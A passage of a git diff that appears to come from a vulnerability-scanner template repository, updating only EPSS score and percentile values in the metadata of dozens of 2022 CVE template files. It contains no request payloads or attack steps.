b/http/cves/2022/CVE-2022-39960.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-39960 cwe-id: CWE-862 epss-score: 0.24578 - epss-percentile: 0.96174 + epss-percentile: 0.962 cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index 51f425e9b2..f9bd45869e 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-39986 cwe-id: CWE-77 - epss-score: 0.84732 - epss-percentile: 0.982 + epss-score: 0.83003 + epss-percentile: 0.98152 cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index f96446e4c5..e40e26e803 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40022 cwe-id: CWE-77 - epss-score: 0.79556 - epss-percentile: 0.97981 + epss-score: 0.82544 + epss-percentile: 0.98138 cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml index 559a241320..86858cd0c9 100644 --- a/http/cves/2022/CVE-2022-40032.yaml +++ b/http/cves/2022/CVE-2022-40032.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40032 cwe-id: CWE-89 - epss-score: 0.00205 - epss-percentile: 0.58307 + epss-score: 0.00174 + epss-percentile: 0.54566 cpe: cpe:2.3:a:simple_task_managing_system_project:simple_task_managing_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml index 71e4315de9..74e5150faf 100644 --- a/http/cves/2022/CVE-2022-40047.yaml +++ b/http/cves/2022/CVE-2022-40047.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-40047 cwe-id: CWE-79 epss-score: 0.00535 - epss-percentile: 0.74539 + epss-percentile: 0.74669 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml index 01b637f41b..177d11150f 100644 --- a/http/cves/2022/CVE-2022-40083.yaml +++ b/http/cves/2022/CVE-2022-40083.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.6 cve-id: CVE-2022-40083 cwe-id: CWE-601 - epss-score: 0.01535 - epss-percentile: 0.85619 + epss-score: 0.0212 + epss-percentile: 0.88007 cpe: cpe:2.3:a:labstack:echo:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index 2331ac6f15..c68f29beaf 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-40127 cwe-id: CWE-94 - epss-score: 0.14098 - epss-percentile: 0.95141 + epss-score: 0.156 + epss-percentile: 0.95392 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40359.yaml b/http/cves/2022/CVE-2022-40359.yaml index e05e874af6..0d5096abe7 100644 --- a/http/cves/2022/CVE-2022-40359.yaml +++ b/http/cves/2022/CVE-2022-40359.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-40359 cwe-id: CWE-79 epss-score: 0.00109 - epss-percentile: 0.43445 + epss-percentile: 0.43507 cpe: cpe:2.3:a:kfm_project:kfm:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index 4cec681325..4f93012e98 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4049 cwe-id: CWE-89 - epss-score: 0.03134 - epss-percentile: 0.90041 + epss-score: 0.03472 + epss-percentile: 0.90572 cpe: cpe:2.3:a:wp_user_project:wp_user:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index 9fa066b1d3..8a11b116fd 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4050 cwe-id: CWE-89 - epss-score: 0.03134 - epss-percentile: 0.90041 + epss-score: 0.03472 + epss-percentile: 0.90572 cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index e1b9879d2d..45ae508ac6 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-4057 cwe-id: CWE-425 - epss-score: 0.00196 - epss-percentile: 0.57317 + epss-score: 0.00125 + epss-percentile: 0.46949 cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml index d07971c77f..b92805f78e 100644 --- a/http/cves/2022/CVE-2022-4059.yaml +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4059 cwe-id: CWE-89 - epss-score: 0.01364 - epss-percentile: 0.84717 + epss-score: 0.01515 + epss-percentile: 0.85591 cpe: cpe:2.3:a:blocksera:cryptocurrency_widgets_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml index 7ff0a7e98f..fcfbd79143 100644 --- a/http/cves/2022/CVE-2022-4060.yaml +++ b/http/cves/2022/CVE-2022-4060.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4060 cwe-id: CWE-94 - epss-score: 0.02055 - epss-percentile: 0.87767 + epss-score: 0.0229 + epss-percentile: 0.8853 cpe: cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 29205bf34b..034bd0b298 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4063 cwe-id: CWE-22 - epss-score: 0.02354 - epss-percentile: 0.88621 + epss-score: 0.02826 + epss-percentile: 0.89619 cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40684.yaml b/http/cves/2022/CVE-2022-40684.yaml index 40bb52365c..7b296262ca 100644 --- a/http/cves/2022/CVE-2022-40684.yaml +++ b/http/cves/2022/CVE-2022-40684.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40684 cwe-id: CWE-287 - epss-score: 0.95639 - epss-percentile: 0.99248 + epss-score: 0.95976 + epss-percentile: 0.99342 cpe: cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index 3041345941..9d86fe6b22 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-40734 cwe-id: CWE-22 - epss-score: 0.01333 - epss-percentile: 0.84503 + epss-score: 0.01632 + epss-percentile: 0.86143 cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index f056628912..eea399df1e 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-40843 cwe-id: CWE-287 epss-score: 0.33771 - epss-percentile: 0.9664 + epss-percentile: 0.96664 cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\(1576\):*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index 27a4f98577..1c7331bb7f 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-40879 cwe-id: CWE-79 - epss-score: 0.02006 - epss-percentile: 0.87606 + epss-score: 0.01051 + epss-percentile: 0.82394 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index 6f12999fe5..227d264969 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40881 cwe-id: CWE-77 - epss-score: 0.96157 - epss-percentile: 0.99369 + epss-score: 0.96169 + epss-percentile: 0.99389 cpe: cpe:2.3:o:contec:solarview_compact_firmware:6.00:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index 6580e46e0b..fbf6eaf5c3 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4117 cwe-id: CWE-89 - epss-score: 0.03393 - epss-percentile: 0.90408 + epss-score: 0.03182 + epss-percentile: 0.90165 cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4140.yaml b/http/cves/2022/CVE-2022-4140.yaml index c596ac628d..12582d1667 100644 --- a/http/cves/2022/CVE-2022-4140.yaml +++ b/http/cves/2022/CVE-2022-4140.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-4140 cwe-id: CWE-552 - epss-score: 0.00961 - epss-percentile: 0.81486 + epss-score: 0.01317 + epss-percentile: 0.84504 cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index 092a28a638..38395df5e8 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-41441 cwe-id: CWE-79 - epss-score: 0.00091 - epss-percentile: 0.38478 + epss-score: 0.00108 + epss-percentile: 0.43362 cpe: cpe:2.3:a:reqlogic:reqlogic:11.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index cb3224dd9f..791056ede3 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-41473 cwe-id: CWE-79 - epss-score: 0.02006 - epss-percentile: 0.87606 + epss-score: 0.02818 + epss-percentile: 0.89607 cpe: cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-41840.yaml b/http/cves/2022/CVE-2022-41840.yaml index 20c2990a2f..8dd8f91a3a 100644 --- a/http/cves/2022/CVE-2022-41840.yaml +++ b/http/cves/2022/CVE-2022-41840.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-41840 cwe-id: CWE-22 - epss-score: 0.0077 - epss-percentile: 0.79182 + epss-score: 0.00738 + epss-percentile: 0.78774 cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 47d83c8d12..53d2647db8 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.8 cve-id: CVE-2022-42094 cwe-id: CWE-79 - epss-score: 0.00567 - epss-percentile: 0.75259 + epss-score: 0.00283 + epss-percentile: 0.65254 cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml index e9ba3aa0d2..b5a48c2e52 100644 --- a/http/cves/2022/CVE-2022-42095.yaml +++ b/http/cves/2022/CVE-2022-42095.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.8 cve-id: CVE-2022-42095 cwe-id: CWE-79 - epss-score: 0.00566 - epss-percentile: 0.75243 + epss-score: 0.00283 + epss-percentile: 0.65226 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml index f5a0bf6f8a..841a9db9ae 100644 --- a/http/cves/2022/CVE-2022-42096.yaml +++ b/http/cves/2022/CVE-2022-42096.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4.8 cve-id: CVE-2022-42096 cwe-id: CWE-79 - epss-score: 0.0069 - epss-percentile: 0.77842 + epss-score: 0.00345 + epss-percentile: 0.68611 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml index fadde8eca4..026b8da036 100644 --- a/http/cves/2022/CVE-2022-42233.yaml +++ b/http/cves/2022/CVE-2022-42233.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-42233 cwe-id: CWE-287 - epss-score: 0.86407 - epss-percentile: 0.98287 + epss-score: 0.87277 + epss-percentile: 0.98372 cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml index 9bfac3a914..5a0b922f71 100644 --- a/http/cves/2022/CVE-2022-4260.yaml +++ b/http/cves/2022/CVE-2022-4260.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4.8 cve-id: CVE-2022-4260 cwe-id: CWE-79 - epss-score: 0.00086 - epss-percentile: 0.35852 + epss-score: 0.00092 + epss-percentile: 0.38897 cpe: cpe:2.3:a:wp-ban_project:wp-ban:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index 1ca9f1f3a9..c6f43b26a2 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-42746 cwe-id: CWE-79 epss-score: 0.00109 - epss-percentile: 0.43445 + epss-percentile: 0.43507 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index 4dd01b6499..0a9c1be1af 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-42747 cwe-id: CWE-79 epss-score: 0.00109 - epss-percentile: 0.43445 + epss-percentile: 0.43507 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index 0721eb2d8e..d3b2e58920 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-42748 cwe-id: CWE-79 epss-score: 0.00109 - epss-percentile: 0.43445 + epss-percentile: 0.43507 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index e87876a15c..c0026cea49 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-42749 cwe-id: CWE-79 epss-score: 0.00109 - epss-percentile: 0.43445 + epss-percentile: 0.43507 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index 45b06f22e4..479798b80a 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4295 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29156 + epss-score: 0.00078 + epss-percentile: 0.32657 cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml index 910235349c..f39126704c 100644 --- a/http/cves/2022/CVE-2022-4301.yaml +++ b/http/cves/2022/CVE-2022-4301.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-4301 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32706 + epss-percentile: 0.32657 cpe: cpe:2.3:a:sunshinephotocart:sunshine_photo_cart:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 162ab2f9b0..9fc407a864 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-43014 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40501 + epss-percentile: 0.40565 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index 377f6fd4e4..83f6d61536 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-43015 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40501 + epss-percentile: 0.40565 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index 0fcbe81faf..acc72e9797 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-43016 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40501 + epss-percentile: 0.40565 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index 3d11d5f4b8..9e78296b75 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-43017 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40501 + epss-percentile: 0.40565 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index bfc6dc5e75..706c2ab37e 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-43018 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40501 + epss-percentile: 0.40565 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4305.yaml b/http/cves/2022/CVE-2022-4305.yaml index 5c7449ceb8..b5be1919e1 100644 --- a/http/cves/2022/CVE-2022-4305.yaml +++ b/http/cves/2022/CVE-2022-4305.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4305 cwe-id: CWE-269 - epss-score: 0.04788 - epss-percentile: 0.91849 + epss-score: 0.03628 + epss-percentile: 0.9075 cpe: cpe:2.3:a:wp-buy:login_as_user_or_customer_\(user_switching\):*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4306.yaml b/http/cves/2022/CVE-2022-4306.yaml index 82197bdaa1..a71bf6dc09 100644 --- a/http/cves/2022/CVE-2022-4306.yaml +++ b/http/cves/2022/CVE-2022-4306.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-4306 cwe-id: CWE-79 - epss-score: 0.00077 - epss-percentile: 0.32054 + epss-score: 0.00086 + epss-percentile: 0.35613 cpe: cpe:2.3:a:panda_pods_repeater_field_project:panda_pods_repeater_field:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml index 0df0bdf39f..6366888192 100644 --- a/http/cves/2022/CVE-2022-43140.yaml +++ b/http/cves/2022/CVE-2022-43140.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-43140 cwe-id: CWE-918 - epss-score: 0.17778 - epss-percentile: 0.95631 + epss-score: 0.15211 + epss-percentile: 0.95316 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index ee3778c389..0b52418fd1 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-43164 cwe-id: CWE-79 epss-score: 0.00211 - epss-percentile: 0.58791 + epss-percentile: 0.5896 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index a3c22bab87..8e8ff320b4 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-43165 cwe-id: CWE-79 epss-score: 0.00211 - epss-percentile: 0.58791 + epss-percentile: 0.5896 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index ecac95b2d4..001ad3bde3 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-43166 cwe-id: CWE-79 epss-score: 0.00211 - epss-percentile: 0.58791 + epss-percentile: 0.5896 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index 8f82ba899f..d26ab2c857 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-43167 cwe-id: CWE-79 epss-score: 0.00211 - epss-percentile: 0.58791 + epss-percentile: 0.5896 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index 74de24b17e..568dd3ddc3 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-43169 cwe-id: CWE-79 epss-score: 0.00211 - epss-percentile: 0.58791 + epss-percentile: 0.5896 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index 7d519e666a..1e471852c4 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-43170 cwe-id: CWE-79 epss-score: 0.20629 - epss-percentile: 0.95883 + epss-percentile: 0.95935 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index f62e204d9b..61f03728e8 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43185 cwe-id: CWE-79 - epss-score: 0.40662 - epss-percentile: 0.96927 + epss-score: 0.45754 + epss-percentile: 0.97082 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4320.yaml b/http/cves/2022/CVE-2022-4320.yaml index 2c29ee8b27..337dc8d979 100644 --- a/http/cves/2022/CVE-2022-4320.yaml +++ b/http/cves/2022/CVE-2022-4320.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4320 cwe-id: CWE-79 - epss-score: 0.00083 - epss-percentile: 0.34469 + epss-score: 0.00092 + epss-percentile: 0.3872 cpe: cpe:2.3:a:mhsoftware:wordpress_events_calendar_plugin:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index fac5c18b51..75ccea28fb 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4321 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29156 + epss-score: 0.00078 + epss-percentile: 0.32657 cpe: cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml index f88c6359e9..ce4212e698 100644 --- a/http/cves/2022/CVE-2022-4325.yaml +++ b/http/cves/2022/CVE-2022-4325.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-4325 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32706 + epss-percentile: 0.32657 cpe: cpe:2.3:a:ifeelweb:post_status_notifier_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml index 348ad4aab5..5b7143e10b 100644 --- a/http/cves/2022/CVE-2022-4328.yaml +++ b/http/cves/2022/CVE-2022-4328.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4328 cwe-id: CWE-434 - epss-score: 0.44595 - epss-percentile: 0.97033 + epss-score: 0.22681 + epss-percentile: 0.96077 cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index d131bc2e8c..e056423a01 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-43769 cwe-id: CWE-94,CWE-74 - epss-score: 0.31135 - epss-percentile: 0.96522 + epss-score: 0.33038 + epss-percentile: 0.96634 cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44290.yaml 